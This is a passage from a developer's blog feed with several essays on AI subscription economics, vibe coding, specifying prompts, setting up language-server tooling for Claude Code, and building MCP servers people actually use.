I know, I know — “but they use thousands of GPUs in parallel.” Yes. And those thousands of GPUs cost tens of millions of dollars for a single training run. That’s before we talk about the ongoing cost of serving that model to every user who hits the API every day. Training is the capital expenditure. Inference — every time you actually use Claude — is the operating cost. I’m talking about the second thing. Both are obscene.

Let’s look at what’s actually happening, because the numbers are — and I say this as someone who’s seen a lot of startup math — genuinely unhinged.

OpenAI’s revenue went from $3.7 billion in 2024 to over $20 billion ARR by end of 2025. Ten times in two years. Sounds like they’ve figured it out. Except their own internal projections show losses of $14 billion in 2026 — against $13 billion in revenue. The revenue explodes. The costs explode faster. Microsoft has put in $13 billion. SoftBank committed $41 billion across various tranches. A 2026 funding round valued the company at $730 billion. None of this is profit. All of it is gap-filling.

Anthropic is nearing $20 billion in annualized revenue as of early 2026 — up from $1 billion at the start of 2025. Google has put in over $3 billion in equity, plus a cloud infrastructure deal described as “tens of billions” in compute. Amazon has committed $8 billion. The Series G closed at a $380 billion valuation. These are not investments in a profitable business. These are bets on essential infrastructure, placed by people who are terrified of the alternative.

Google’s own AI division is entirely subsidized by search advertising. They watched OpenAI nearly disrupt their core business and decided that losing money on AI is preferable to losing the company. You can’t really argue with the logic. You can appreciate that the logic benefits you.

Here’s what makes this particularly strange: the more usage grows, the worse the unit economics get. OpenAI’s gross margins collapsed from roughly 40% to 33% in 2025 because inference costs quadrupled as usage scaled. They’re getting less efficient per dollar as they get bigger. The burn isn’t winding down. It’s accelerating.

They’re all playing the same game — lose money now, win the market, figure out profitability later. You’ve seen this movie. AWS subsidized startups through aggressive discounting from 2008-2015 and built the most profitable cloud business in history. Uber burned billions subsidizing rides below cost for seven years. Every streaming service ran at a loss from 2015-2022 while racing to lock in subscribers before the music stopped.

The pattern: 5-8 years of heavy subsidies. Prices normalize. The land grab ends. Survivors optimize for margin.

AI is somewhere in year 3-4 of this cycle.

Why They’re Subsidizing You Specifically

Here’s the part most people miss.

It’s not just the gym membership model — yes, light users subsidize heavy users across the subscriber base. But for developers specifically, you serve a purpose that goes way beyond the math:

You evangelize. Every blog post about Claude Code, every Hacker News comment about your workflow, every Slack recommendation to a colleague — that’s marketing no ad budget can replicate. Authentic practitioner enthusiasm is worth more than a campaign, and they get it from you for free.

You’re the top of the enterprise funnel. The conversion path goes: you try Pro, you love it, you build something real, you show your team, your team shows leadership, leadership signs a $500K enterprise contract. That single deal is worth 2,500 Max subscribers. You’re not where the money is. You’re where the money comes from.

You stress-test the product. Power users find the edges. You file the bug reports casual users never hit. This feedback loop is genuinely expensive to replicate through formal QA — and you’re doing it gratis.

You build the ecosystem. Tutorials, repos, guides, courses. The content that helps a thousand other developers get value from the product? That’s unpaid work you’re doing for their platform.

You are, in the most literal sense, being paid for this in subsidized compute. It’s a trade. The question is whether you’re getting the better end of it.

(You are. Obviously. That’s the point.)

How Long Does the Window Stay Open?

Nobody knows. Anyone giving you a specific timeline is guessing, including me.

But the runway math doesn’t matter as much as the signals. Watch these:

Usage limits tightening. Already happening. “Unlimited” has gotten more creative in its definition. Rate limits appear. Fair use policies materialize. You’ve noticed.

Tier restructuring. The free tier gets worse. The basic tier gets capped. The premium tier develops features that used to be standard. The ladder shifts.

API price changes. When enterprise revenue is strong enough to sustain the business, the argument for subsidizing consumers weakens. Check the API pricing page periodically.

Enterprise-only features. When the best capabilities start requiring a sales call, the consumer product is no longer the growth driver.

My working model: 18-24 months of relatively stable economics. After that, genuine uncertainty.

The open-source wildcard could extend the window or change what “subsidized” even means. The gap between frontier models and the best open-weight models has compressed dramatically — we’re talking 6-12 months behind the frontier now, versus the 18-24 months people were citing a year ago. Running genuinely capable models locally on a Mac is already real, not theoretical. That’s a hedge against pricing pressure, but it doesn’t change the core argument. It just means the floor is higher than it was.

Either way: cheap access to frontier AI while the models keep getting dramatically better is the thing with the uncertain timeline. Don’t wait for a clear signal. By the time the signal is clear, the window is already closing.

What You Should Actually Be Building

This is where I have to resist the urge to give you a twenty-point tactical playbook. (I’m saving that for a separate post. Watch for it.)

The mental model is simple: use subsidized tools to build assets you own. Don’t just consume. Create.

For developers building SaaS, this means a few things specifically:

Ship the MVP, not the perfect version. Claude Code does 70% of the implementation and you do the system design and judgment calls. A SaaS MVP that would have taken three months solo two years ago takes a weekend now. These economics are extraordinary and they will not last forever. The price of “wait until it’s ready” is time you don’t have.

Build the content moat before everyone else does. Technical guides, deep-dives, tutorials on topics you actually know. This content ranks before your competitors get around to writing theirs. The window for content arbitrage — where AI-assisted quality beats raw human output at volume — is also temporary. The ones who started in 2025-2026 will own the long-tail traffic. The rest will write for audiences that already exist.

Develop taste. This is the skill that survives every model improvement and every price normalization. Knowing whether AI output is actually good — whether the code is maintainable, whether the architecture makes sense, whether the essay says something real — is something that cannot be automated. It gets more valuable as AI gets cheaper. Invest in it.

Build the audience. Newsletter subscribers, people who trust your recommendations, readers who show up when you publish. This is the asset that persists regardless of what happens to model pricing. You’re not renting audience from Anthropic. You own it.

The math I keep returning to: 18 months of focused effort with subsidized AI tools could produce 3-5 years of normal-pace output. The SaaS you’ve been procrastinating? You could ship three of them. The content backlog? Gone. The technical course based on your experience? Done.

That compounds. The skills sharpen. The audience grows. By the time pricing normalizes, you’ve already built the moat.

The Only Question That Matters

You pay 200/month.You′regetting200/month.You′regetting600-900/month in value. That arbitrage exists right now, today.

But the real arbitrage isn’t the monthly spread. It’s what you build during the window.

The people who win this period aren’t the ones who used Claude for the most impressive demo or the most clever prompt chain. They’re the ones who used cheap frontier AI access to build products, audiences, and content that persist after the subsidies end.

So: what are you shipping?

The clock’s running.

This post started as a rabbit hole triggered by a paragraph in Sebastian Raschka’sBuild a Large Language Model from Scratch (Manning). His Substack is obviously worth following:@rasbt.

]]>

Will Vibe Coding Replace Developers? COBOL Already Tried.

Lakshmi Narasimhan — Sun, 08 Mar 2026 00:00:00 +0000

Last month I spent about forty minutes arguing with Claude Code about a rate limiter.

Not debugging a rate limiter. Not implementing one.Arguing. I had typed “add a usage limit to the free tier” and gotten back something that technically worked — it counted things and stopped you when you hit the limit — but was also completely wrong in about six different ways that I hadn’t specified because I hadn’t thought to specify them.

When does the counter reset? Daily? Monthly? On the billing cycle? What counts as a usage event — an API call, a feature access, a row stored? What happens at exactly 100%: hard block, soft warning, grace period where we beg you to upgrade? Do existing free users get grandfathered, or do they wake up tomorrow blocked from the thing they’ve been using for three months? What if someone hits the limit mid-checkout?

I hadn’t answered any of those questions. I had typed eight words and expected a computer to answer them for me. And the computer, being a computer (a very impressive one, but still a computer), had silently picked answers that seemed reasonable. UTC midnight resets. Hard blocks. No grandfathering.

Nobody wants UTC midnight resets. Nobody wants a hard block in the middle of checkout. And nobody, including me, had thought to say so.

That forty-minute argument was, in the precise technical sense, programming. Not in the syntax sense. In the real sense: figuring out exactly what I wanted the computer to do, in enough detail that it could actually do it.

Which brings me to Grace Hopper, and why the current panic about AI replacing developers is about sixty-five years old.

In 1959, Grace Hopper helped create a programming language called COBOL.

Common Business-Oriented Language. The name is the pitch. This isn’t for programmers — it’s forbusiness people. The syntax looked like a business memo. You wroteADD SALESTAX TO TOTALPRICE GIVING INVOICE-TOTAL. Sentences. Paragraphs. English words that a manager could theoretically read and understand and maybe, just maybe, write.

The promise was explicit: if the language is human enough, we won’t need programmers as intermediaries. Business users could specify their own software. The bottleneck — translating business requirements into code — would evaporate.

You know how this ends. COBOL created more programmer jobs than almost any technology before or since. Banks ran it for sixty years. Governments still run it. The programmer shortage it was supposed to prevent became one of the most persistent gaps in technology. The job postings for COBOL developers today —today, in 2026 — pay embarrassingly well because the people who understand those systems are retiring and there aren’t enough people to replace them.

The promise evaporated. The programmers did not.

Now, the obvious response here is: that was 1959. We were trying to replace programmers withverbose English-looking syntax. That’s completely different from vibe coding, which usesactual English, processed by a large language model that has ingested most of human knowledge. The comparison is unfair.

Fair enough. Let me make it fair.

After COBOL came 4th generation languages — the 70s and 80s promised that business users could generate reports and query databases without programmers. And they could! Until anything got complex, at which point someone had to specify what “complex” meant. That someone was, increasingly, a programmer with a different job title.

Then HyperCard in 1987. Anyone could build interactive applications — stacks, cards, buttons, scripts. And many people did! Wonderful things. And then the moment you wanted it to do something non-trivial, you needed to understand enough about conditional logic and data structures that you were, functionally, programming. The interface was friendlier. The underlying activity was identical.

Then no-code in the 2010s. Citizen developers. Visual workflows. Drag-and-drop databases. I watched three different companies I worked at try to use no-code platforms to “reduce dependency on engineering.” It reduced dependency on engineering the same way COBOL did: by creating a new class of technical specialists (now called “no-code developers” or “operations engineers”) who spent their days fighting with visual tools that couldn’t quite express what they needed to express.

Same experiment, sixty-five years, same result. Better interface, same bottleneck.

Here’s what I think is actually happening, and a comment on a Hacker News thread about agentic engineering said it more precisely than I can:

“When you get down to breaking down that problem… you become a programmer.”

The average person doesn’t know what their actual problems are in sufficient detail to get a working solution. Not because they’re not smart. Becausethe act of breaking a problem down into precisely specified steps that a computer can execute without ambiguity is programming — regardless of whether the syntax isCOMPUTE TAX = PRICE * RATE ordef calculate_tax(price, rate): return price * tax or “hey, write me something that calculates tax.”

The specification is the programming. The syntax is just notation.

Vibe coding is genuinely different from COBOL in one important sense: the interface change is more dramatic. Natural language processed by a model that can write working TypeScript from a vague description is qualitatively new. The gap between “what you type” and “what runs” has never been smaller.

But the gap between “what you type” and “what you actually wanted” is exactly as large as it’s always been. Possibly larger, because the tool is so capable that it confidently fills in every unspecified detail, silently, in ways that seem reasonable until they’re not.

My rate limiter reset at UTC midnight because I didn’t say it shouldn’t. The agent wasn’t wrong. I was underspecified.

What vibe coding has genuinely changed: the syntax, the boilerplate, the standard implementations of standard patterns are now basically free. A solo developer with Claude Code can ship in a week what used to take a team a month. That’s real leverage and I use it every day.

What hasn’t changed: the irreducible core of the job — figuring out with enough precision what you want the computer to do — is still entirely human work. And based on sixty-five years of running this experiment, there’s a reasonable argument that it’sdefinitionally human work. When you get specific enough about a problem to get a working solution, you’ve already done the programmer’s job. You might be doing it in plain English now instead of Python. You’re still doing it.

The developer job is changing. Less time on syntax, more time on the thinking that was always the hard part. More time arguing with your tools about exactly what you meant. More time specifying the edge cases before the tool invents its own.

If you’ve ever wanted to spend less time fighting TypeScript compiler errors and more time actually thinking about what you’re building — genuinely, that part is better now.

But the thinking is still yours.

The programmers are still here. They’ve been here since 1959. They’ll be here after vibe coding. They just keep getting better tools.

Learn from the evidence. It’s sixty-five years old and it’s not subtle.

]]>

What Chinese Factories Taught Me About Prompting Claude Code

Lakshmi Narasimhan — Tue, 03 Mar 2026 00:00:00 +0000

A few weeks ago, I fell down a Hacker News rabbit hole at 11pm. Someone had posted a manufacturing post-mortem — one of those beautiful, painful essays where a hardware founder documents exactly how badly they got burned.

This founder had designed a custom lamp. Spent months prototyping. Found a factory in Shenzhen. Shipped 500 units.

When the boxes arrived, the light-entry holes had been used as casting pour-points — the factory needed somewhere to pour the material, saw the holes, and went with it. The cable tails were two centimeters instead of ten. The knobs didn’t fit because the powder coating added thickness that nobody put in the spec. Everything technically matched the purchase order. Nothing actually worked.

I read that post-mortem three times. Then I read the top comment, which was one of those sentences that you immediately screenshot because it’s just too true:

“Anything you don’t specify will be done at minimum cost.”

I put my phone down. I looked at the ceiling. And then I thought about the email sender I’d had Claude Code generate that afternoon.

Let me tell you what I had asked for: “Send a welcome email to new users when they sign up.”

Let me tell you what I got: A function that sent emails. Technically correct. It looped over every new user and called the email API synchronously, one by one, waiting for each response before moving to the next. No rate limiting. No retry logic. No unsubscribe link — because I didn’t ask for one, and CAN-SPAM compliance wasn’t in the prompt. When I ran it against a list of 8,000 users, it fired all 8,000 requests in a tight loop, Gmail flagged the sending domain as a spam source within six hours, and my domain was blacklisted before I’d finished my coffee.

Everything sent. Nothing arrived.

I had been vibe coding with Claude Code for six months at that point, and I thought I was pretty good at it. I could get it to build things fast. I could chain prompts together. I hadCLAUDE.md files and hooks and all the trappings of someone who knew what they were doing.

What I didn’t understand — what the Hacker News post-mortem forced me to understand — is that I had completely misidentified what kind of relationship I was in.

I thought I was pair programming with a senior engineer.

I was issuing purchase orders to a factory.

This distinction sounds philosophical. It isn’t. It has concrete, expensive implications for every vibe coding prompt you write.

A senior engineer fills gaps with judgment. If you say “build auth,” a good senior engineer asks: what are the scale requirements? What’s the threat model? Are we storing PII? They fill the spec gaps with professional standards because they have skin in the game — it’s their name on the code, their reputation on the line, their on-call rotation if it breaks at 3am.

A factory fills gaps with cost optimization. If the spec doesn’t say “cable tails must be 10cm,” the factory cuts them at 2cm. Not because they’re malicious. Because that’s 8cm of wire per unit times 500 units and someone’s margin depends on it. They’re perfectly rational. They’re just optimizing for something that has nothing to do with whether your lamp works.

Claude optimizes for “satisfies the prompt.” That’s the whole job. Your vague prompt is its permission to take shortcuts, and it will take them — not maliciously, but with the same rational efficiency as a factory floor supervisor who notices you didn’t specify the minimum acceptable wire gauge.

Here’s the thing about the hardware community that I find both humbling and enraging: they figured this out decades ago. They built an entire profession around it. These people are called sourcing agents, and their whole job is translating “I want a nice lamp” into a 47-page document covering material density, wire gauge, coating thickness, packaging dimensions, UV stability ratings, and what happens to the tooling if the order falls below minimum quantity.

Forty-seven pages. For a lamp.

In vibe coding, the sourcing agent is you. Most developers have been accidentally promoted to this role without realizing it. They’re still acting like they’re talking to a colleague. They’re actually running a factory and they’re skipping the quality control, the detailed specs, and the first-article inspection — all the boring stuff that hardware people do automatically because they’ve shipped enough garbage to know better.

I’ve started reading Hacker News manufacturing posts specifically to steal their frameworks for this. A few things that have genuinely changed how I write prompts:

Spec your constraints, not just your features. “Send welcome emails” is a feature request. “Send welcome emails via SES, rate-limited to 14 per second to stay under AWS sending limits, with exponential backoff and a max of 3 retries on failure, an unsubscribe link in the footer per CAN-SPAM, a plain-text fallback alongside the HTML version, and a hard skip for any address that has previously bounced or complained” is a spec. The difference isn’t intelligence — it’s the same way specifying wire gauge isn’t about distrusting your factory. It’s about understanding that factories don’t have opinions about wire gauge. They have margins.

Inspect the first batch before commissioning the full run. Hardware founders don’t ship the first production run to customers. They order samples. They measure every dimension with calipers. The good ones fly to Shenzhen and stand on the factory floor. The developer equivalent is reading the first 200 lines of generated code before asking Claude to build the next feature on top of it. Check the database schema before building the API on top of it. Read the auth flow before adding the permissions layer. This feels slow. It is much faster than discovering that the foundation is wrong after you’ve built four floors.

Specify what you don’t want. This one surprised me. Experienced sourcing agents reportedly spend half their spec document on exclusions. “No recycled plastic in structural components.” “No substituted components without written approval.” “No unlicensed firmware.” They’ve learned that a factory will always find the interpretation of the spec that costs them the least, so you have to close the doors. For prompts: “No inline styles. No TypeScriptany types. Noconsole.log for error handling. NoSELECT * queries. No external dependencies unless they’re in the approved list.” The AI will not volunteer that it’s about to do these things. It will do them and move on.

Budget time for the spec, not just the build. Hardware founders allocate somewhere between 30-40% of their project timeline to specification work. The manufacturing part — the actual production — is the smaller slice. Vibe coders typically invert this. Five percent on the prompt, ninety-five percent on generating code and then debugging the surprising things that came out of a vague prompt. The debugging is expensive. The spec is cheap.

The thing I keep coming back to is that using Chinese manufacturers is incredible leverage. You can build a physical product without owning a factory, without specialized tooling knowledge, without decades of manufacturing experience. It’s genuinely one of the great unlocks of the modern economy. And it works — when you write the spec correctly.

Using Claude to write code is the same kind of leverage. You can build things without knowing every library, without remembering every API, without holding the entire codebase in your head at once. It works. When you treat it like what it is.

Your prompt is a manufacturing spec. The code is the factory output. The factory will be rational, efficient, and completely indifferent to whether your product actually works.

Write the spec accordingly.

Or enjoy your two-centimeter cable tails.

]]>

Claude Code Has Been Navigating Your Codebase Like a Tourist With No Map

Lakshmi Narasimhan — Mon, 02 Mar 2026 00:00:00 +0000

Here’s a thing that happened to me.

I was watching a Claude Code session — one of those where you hand the agent a task and then sit back to observe, feeling very enlightened and modern. The task was simple: find where user authentication was implemented and add a new field to the login flow.

The agent started grepping.authenticate. Thenauth. Thenlogin. ThenloginUser. ThenhandleLogin. Each grep taking 3-8 seconds, scanning hundreds of files, returning walls of output full of comments, test fixtures, variable names that happened to contain the word “auth”, README lines I’d written two years ago and forgotten.

Six minutes in, the agent had read approximately 40% of my codebase and was confidently editing… a test helper that mocked authentication. Not the actual implementation. A mock. In a test file.

I watched it do this — a system with the reasoning capacity of a senior engineer, burning through context and API calls to do something that VS Code does when I hold Ctrl and click a function name. Something VS Code has done since 2016. Something that takes 50 milliseconds.

This is the state of the art in 2026. The most capable AI coding tool available, navigating your codebase the way your grandfather would navigate a foreign city: slowly, incorrectly, and with a lot of asking for directions from people who don’t know either.

There’s a fix. There are actually two fixes, and you need both. But first I want to explain why the problem is worse than it looks, because if you don’t understand the root cause, you’ll implement half of the solution and wonder why your agents still feel like babysitting.

Let me tell you about grep, and why it’s a disaster for code navigation specifically.

Grep is a text search tool. It finds patterns in text. This is genuinely useful for a lot of things. When you want to find every config file that mentions a database host, grep is perfect. When you want to find a log line, grep is perfect. When you want to navigate code semantically — find where a function isdefined, trace whatcalls a function, understand the type hierarchy — grep is completely wrong for the job. It just happens to be the only hammer available, so everything looks like a nail.

Here’s the specific failure mode. When your agent searches forauthenticate, it finds:

auth.service.ts:47: async authenticate(user: User): Promise {
auth.service.ts:112: // authenticate is called after 2FA verification
auth.middleware.ts:23: // Middleware that calls authenticate() before protected routes
auth.test.ts:8: describe('authenticate', () => {
utils/mock-auth.ts:31: authenticate: jest.fn().mockResolvedValue(mockToken),
config/dev.ts:15: authenticateWithMock: true,
README.md:234: ## How to authenticate

Seven results. One is the actual definition. The agent has to read all of them, reason about which one is the real thing, and then probably read the files surrounding each one to build context. Meanwhile, it’s consuming tokens, spending time, and building a picture of your codebase that’s assembled from grep outputs rather than from actual structural understanding.

The deeper problem: grep doesn’t understand thedifference between a definition, a call site, a comment, a test mock, and a config flag. Those are fundamentally different things in the semantic structure of a codebase. A human engineer with IDE tooling can instantly distinguish them. An agent with only grep cannot — it has to infer the difference from text patterns and context, which it does imperfectly, which means it makes wrong edits, which you have to catch and correct, which is why agent sessions still require babysitting.

This is not a clever problem. We solved it for humans a long time ago.

In 2016, Microsoft did something quietly brilliant. They were building VS Code, and they had a problem: every editor had to implement language intelligence from scratch. Vim plugins, Emacs modes, IntelliJ — everyone was reimplementing the same understanding of what a TypeScript file meant, independently, badly, in incompatible ways.

Their solution was the Language Server Protocol. The idea: separate the “smarts” from the editor. Create a standard protocol where a language server — a standalone process that deeply understands a specific language — can talk to any editor that speaks the protocol. Build the language server once, correctly, and every editor gets the benefit.

A language server is not a text search tool. It parses your code into an Abstract Syntax Tree. It resolves types. It builds a symbol table — a complete map of every identifier in your codebase: what it is, where it’s defined, what it references, what references it. When VS Code shows you thatauthenticate is defined inauth.service.ts on line 47, it’s not searching for the string “authenticate.” It’s looking upauthenticate in the symbol table and getting back a precise answer in under 50 milliseconds.

LSP was so obviously right that it became universal. Every serious editor implemented it. Every major language has a language server:pyright for Python,gopls for Go,typescript-language-server for TypeScript,rust-analyzer for Rust,clangd for C/C++. You almost certainly have at least one of these running on your machine right now.

The irony is that we gave AI agents trillion-parameter language models with remarkable reasoning capabilities, and then handed them grep for code navigation. Like building a Formula 1 car and fitting it with bicycle tires.

Claude Code can connect to these language servers. As of early 2026, this is an undocumented community workaround discovered via a GitHub issue — not an official feature. Which is funny, given how much it changes things. Enable it by adding to~/.claude/settings.json:

{
"env": {
"ENABLE_LSP_TOOL": "1"
}
}

Or export it in your shell profile if you prefer:

export ENABLE_LSP_TOOL=1

Then install the language server plugin for your stack. Claude Code has a plugin system for this — update the marketplace first, then install:

claude plugin marketplace update claude-plugins-official
# TypeScript/JavaScript
claude plugin install typescript-lsp
npm install -g typescript-language-server typescript
# Python
claude plugin install pyright-lsp
npm install -g pyright
# Go
claude plugin install gopls-lsp
go install golang.org/x/tools/gopls@latest
# Rust
claude plugin install rust-analyzer-lsp
rustup component add rust-analyzer

One gotcha that will silently waste your time: a plugin can be installed but disabled. An installed, disabled plugin does nothing — no LSP server registers at startup, no tools become available, no error. Just grep, same as before. After installing, runclaude plugin list and confirm the status readsenabled. If it showsdisabled, runclaude plugin enable . Check this before you spend 20 minutes wondering why nothing changed.

Once enabled, your agent gets access to tools that most people don’t know exist:

goToDefinition — exact location of any symbol’s definition. Not “files that contain this string.” Thedefinition. In ~50ms.

findReferences — every call site in your entire codebase. Every single one, sorted, precise, with file and line number.

workspaceSymbols — search your codebase by symbol name. Returns only actual code symbols (functions, classes, interfaces, variables) — not comments, not strings, not README lines.

hover — full type information for any identifier. When the agent is about to call a function, it can check the exact signature first rather than guessing.

diagnostics — real-time type errors. When the agent changes a function signature, the language server immediately reports every caller that’s now broken. In the same turn. Before the broken code ever runs.

That last one changes the loop entirely. Without LSP, the workflow is: agent makes a change → change breaks something → you run tests → tests fail → agent fixes it → might break something else → iterate. You’re discovering errors through tests, which means you’re discovering them late, which means multiple turns of cleanup for each mistake.

With LSP, the workflow is: agent makes a change → diagnostics immediately flag every type error caused by that change → agent fixes everything in the same turn. Error discovery goes from “whenever you run tests” to “immediately.” This alone is worth the two minutes it takes to set up.

Here’s the catch, and it’s not obvious until you run into it.

Even with LSP enabled and plugins installed and confirmed active, Claude stillprefers grep. Grep is familiar, grep is in its training distribution, grep is what it reaches for first. Having the tools available doesn’t automatically mean Claude will use them.

Add this to yourCLAUDE.md:

## Code Navigation
Prefer LSP tools over Grep for any code navigation task:
- Use workspaceSymbol to find symbols by name
- Use goToDefinition to find where something is defined
- Use findReferences to find all call sites
- Use diagnostics after any edit to catch type errors immediately
Use Grep only for text search: log messages, comments, config values,
string literals. Never use Grep to find function definitions.

Explicit instructions inCLAUDE.md override default behavior. This is a documented pattern: the tools exist, but you have to tell the agent to use them. Think of it as configuring the agent’s preferences, not patching the agent’s capabilities.

Now here’s the part where most people stop, and where they shouldn’t.

LSP gives your agent GPS. It knowshow to navigate.findReferences from anywhere in the codebase will return exact results. But GPS without a destination is just a compass. Your agent still has to figure outwhere to go before it can navigate there efficiently.

Think about how an experienced engineer ramps up on a new codebase. They don’t start by grepping for things. They start by asking questions: where does the auth layer live? What’s the database access pattern? How do the services communicate? They build a mental model first, then navigate with precision.

Your agent has no mental model of your codebase unless you give it one. Every session starts cold. It has the code itself (too much to read exhaustively) and the tools to navigate it (useful once oriented) but no map. So it wanders.

The second layer is a structured description of your codebase’s architecture. Not documentation. Not a README. A map for the agent — written in terms of what the agent needs to know to get oriented quickly:

## Codebase Architecture
**Entry point:** src/server.ts bootstraps the app. All route registration happens here.
**Auth layer:** Everything authentication-related lives in /src/auth.
The entry point is `authenticate()` in auth.service.ts.
JWT handling is in auth.middleware.ts. Session storage is Redis via auth.session.ts.
Never bypass the middleware — it handles rate limiting and audit logging.
**Services:** Business logic in /src/services.
PaymentService, UserService, NotificationService are the big three.
Services never call each other directly — all cross-service communication
routes through the event bus in /src/events/index.ts.
**Database:** Prisma ORM. Never write raw SQL — always go through the Prisma client.
Schema lives in /prisma/schema.prisma. Run `npm run db:migrate` after schema changes.
**External integrations:** Stripe in /src/integrations/stripe,
SendGrid in /src/integrations/email. Each integration has a fake for testing.

You put this inCLAUDE.md, or in a dedicatedARCHITECTURE.md thatCLAUDE.md imports via@ARCHITECTURE.md.

What changes: your agent starts the sessionoriented. When you ask it to add a new payment method, it already knows that payment logic lives in/src/services/PaymentService, that external Stripe calls go through/src/integrations/stripe, and that services communicate through the event bus. It doesn’t need to explore your codebase to discover the architecture. It can go directly to the right place and navigate from there with LSP precision.

The GPS analogy only goes so far. A better way to think about it: LSP is your agent’s ability to look something up instantly. Semantic context is the agent knowing what to look up. Both are required. Without the map, LSP is a fast tool pointed in random directions. Without LSP, the map tells you where to go but getting there is still six minutes of grepping.

Together, your agent works the way a senior engineer works on a codebase they know well: they know the territory, they navigate precisely, and they catch their own mistakes before committing them.

The reason I keep coming back to this: the numbers suggest agents are about to do a lot more real work.

Michael Truellannounced recently that Cursor now has 2x more agent users than Tab (autocomplete) users. Agent usage is up 15x in a year. More than a third of PRs merged at Cursor are created by agents running autonomously in the cloud — not a human in the loop, not autocomplete suggestions, agents doing complete pieces of work end-to-end.

If that’s the direction — and the trajectory makes it pretty clear it is — then agents navigating codebases with grep is a bottleneck at the wrong layer. You’ve solved the intelligence problem. You have an agent that can reason about complex changes across multiple files. You have not solved the navigation problem, which means the intelligence is being spent on finding things instead of changing them. It’s like hiring a brilliant architect and making them do their own filing.

LSP and semantic context are table stakes for agent-native codebases. The fact that LSP is buried in settings and semantic maps are a community pattern rather than a first-class feature is a product gap. It’ll get closed. But right now you have to close it yourself, and it takes about thirty minutes.

Set up the language server for your stack. Enable LSP in settings.json. Tell Claude to prefer it inCLAUDE.md. Write an architecture section that orients the agent in the first turn. Thirty minutes of setup for sessions that actually feel autonomous.

Your future self will be insufferably smug about having done this early. That’s a reasonable outcome.

]]>

Why Your MCP Server Will Die in Obscurity

Lakshmi Narasimhan — Thu, 26 Feb 2026 00:00:00 +0000

You built it over a weekend. The code works. Claude can technically call your tools. You added it to the config — if you’re not sure how,Stop Making Claude Code Guess covers the setup — restarted Claude Code, and — nothing. Claude doesn’t use it. Or uses it once, awkwardly, and then forgets it exists.

The problem isn’t your code. The problem is that Claude doesn’t know when to call your tools, so it doesn’t.

This is the thing nobody tells you when you’re learning MCP: the hardest part isn’t building the server. It’s making Claude reach for it.

How Claude Actually Chooses Your Tool

When you ask Claude to do something, it’s doing a matching problem. It looks at what you asked, scans the tools available to it, reads their descriptions, and decides which one — if any — fits.

That last part is the lever most developers ignore. Claude doesn’t run your code to figure out what your tool does. It reads the description you wrote and makes a judgment call. If your description is vague, generic, or poorly matched to the language your users actually use, Claude will skip your tool and try something else. Or just tell you it can’t do the thing.

Here’s a real example. Compare these two tool descriptions for the same function:

Bad: “Query the database.”
Good: “Look up a customer’s order history, subscription status, and recent activity by email address or customer ID. Use this when someone asks about a specific customer’s account.”

The first one is technically accurate. The second one is what Claude can actually match against. “What’s going on withjohn@example.com‘s account?” maps cleanly to the second description. It maps to nothing in the first.

Your tool description is a search index. Write it like one.

The Five Ways MCP Servers Die

1. Bad descriptions. Already covered, but it bears repeating because it’s the most common failure. Every tool, resource, and prompt deserves a description that answers: when should Claude reach for this? Include the kinds of questions or requests that should trigger it. Use the words your users actually use.

2. Too many tools. There’s a temptation to expose everything. Every database table. Every API endpoint. Every configuration option. Resist it. A server with 30 tools is a server Claude gets confused by — and it’s also a server that quietly eats your context window before you’ve typed a word (more on that problem here). It can’t reliably choose the right tool when there are 30 candidates with overlapping descriptions. The best MCP servers do one thing, maybe two, exceptionally well. If you find yourself adding a tenth tool, ask whether you’re building a server or a dumping ground.

3. Output Claude can’t reason about. Tools that return raw JSON blobs, HTML, or binary data are tools Claude struggles to use. Claude works in text. If your tool returns{"data": [{"id": 1, "val": "foo"}, ...]}, Claude has to parse that before it can think about it. If your tool returns “Found 3 orders: Order #1001 (shipped Jan 15), Order #1002 (pending), Order #1003 (refunded)”, Claude can work with that directly. Format your output for a reader, not a parser.

4. Uninstallable. Most MCP servers have no README. No install instructions. No example config. No explanation of what environment variables they need. Even if someone finds your server on GitHub, if they can’t get it running in ten minutes, they close the tab. You will never hear from them again. Distribution is half the product.

5. Solving a problem only you have. This one is uncomfortable because it’s often true. The research tool you built for your specific workflow, against your specific internal data structure, with your specific edge cases handled — it’s not a product, it’s a script. That’s fine. But don’t confuse it for something others will install. The MCP servers that spread are the ones that solve problems many developers have, in a way that requires no customization to be useful out of the box.

What Actually Works

The servers that get used share a few traits.

They have narrow scope with deep utility. Not “do 20 things mediocrely” but “do one thing so well you’d miss it if it was gone.” A good example: a server that searches Hacker News. One tool, one job — search HN, return results with scores and comment counts, formatted so Claude can reason about it immediately. That’s enough. That’s a server people actually keep installed.

They treat descriptions as product copy. Not documentation — copy. The description is the first thing Claude reads and the primary factor in whether your tool gets called. Write it for Claude the way you’d write an app store listing: what does this do, when do you need it, what does success look like.

They fail gracefully and informatively. When something goes wrong, a good tool returns “No results found for ‘X’. Try a broader search term.” A bad tool raises an exception. Claude can work with the first one. It can only apologize for the second.

They’re easy to install. One command. One config block. Clear documentation for what environment variables are needed and what they do. If setup takes more than five minutes, most people won’t finish.

The Gap This Creates

Right now, MCP is early. Most servers are weekend experiments. The production-quality servers — narrow scope, excellent descriptions, graceful error handling, easy installation — are rare.

That gap is an opportunity. A well-built MCP server that solves a real developer problem and is easy to install can spread through Claude Code users the same way good VS Code extensions did: by word of mouth, by being genuinely useful, by being the thing you’d mention in a conversation when someone complains about the problem you solved.

The window isn’t permanent. In six months, there will be a lot more competition. Right now, the bar is low enough that “works reliably and has a clear description” puts you in the top 10%.

That’s what I’m writing about in the MCP Cookbook — a practical guide to building production MCP servers for Claude Code. Not how to write an MCP server; the official docs cover that. How to write one that people actually use.

]]>

While You Panic About AI Taking Jobs, I Built $200/Mo Tools

Lakshmi Narasimhan — Wed, 18 Feb 2026 00:00:00 +0000

I was about to click “Subscribe: $29/month” on yet another AI content tool when I stopped.

Not because $29 was a lot. I’ve subscribed to worse. I have a graveyard of forgotten SaaS products auto-renewing somewhere in my credit card statement, silently draining money for tools I used exactly twice.

No, I stopped because I realized something embarrassing.

This tool was literally just a pretty wrapper around Claude. Same AI I already pay for. Same capabilities. They’d added a nice UI, a payment form, and approximately zero additional value.

I was about to pay $29/month to rent something I could build in an afternoon.

So I closed the tab. Opened Claude Code. And two hours later, I had my own version. No usage limits. No subscription. Mine forever.

That was six months ago. Since then, I’ve built six tools. I’ve eliminated $200/month in subscriptions. And I’ve realized something that changed how I think about this whole “AI is coming for your job” panic.

Everyone’s Worried About the Wrong Thing

My LinkedIn feed is a horror show right now. Every other post is either “AI will take your job” or “Here’s how to survive the AI apocalypse” or some variation of “the robots are coming, repent.”

The advice is always the same. Learn to prompt. Adapt or die. Get your finances in order because disruption is coming.

Maybe it is. I don’t know the future any better than you do.

